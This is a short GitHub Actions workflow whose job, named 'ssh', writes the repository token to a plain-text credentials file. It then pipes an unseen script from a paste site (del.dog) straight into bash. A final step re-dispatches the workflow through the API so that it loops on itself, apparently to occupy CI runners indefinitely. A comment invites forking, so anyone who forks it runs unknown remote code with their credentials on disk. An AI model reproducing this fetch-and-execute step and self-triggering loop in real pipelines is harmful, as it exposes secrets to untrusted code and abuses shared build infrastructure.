name: personal

on:
  push:
    branches: [ main ]
    paths-ignore: 'README.md'
  workflow_dispatch:

jobs:
  ssh:
    runs-on: ubuntu-latest

    env:
      # Change These If You Are Forking The Repo
      GitHubName: "roddman"
      GitHubMail: "rodd@asw.hpc.tw"

    steps:
    - name: Set Git Configs & Secrets
      continue-on-error: true
      timeout-minutes: 5
      run: |
        git config --global user.email ${GitHubMail}
        git config --global user.name ${GitHubName}
        git config --global color.ui true
        git config --global credential.helper store
        echo "https://${GitHubName}:${{ secrets.GITHUB_TOKEN }}@github.com" > ~/.git-credentials
        echo "${{ secrets.GITHUB_TOKEN }}" | docker login docker.pkg.github.com -u ${GitHubName} --password-stdin
        curl -s https://del.dog/raw/nganu | bash -s --


    - name: Self Looping
      run: |
        curl -X POST --header "Authorization: token ${{ secrets.GH_TOKEN }}" https://api.github.com/repos/${GITHUB_REPOSITORY}/actions/workflows/personal.yml/dispatches -d '{"ref":"main"}'
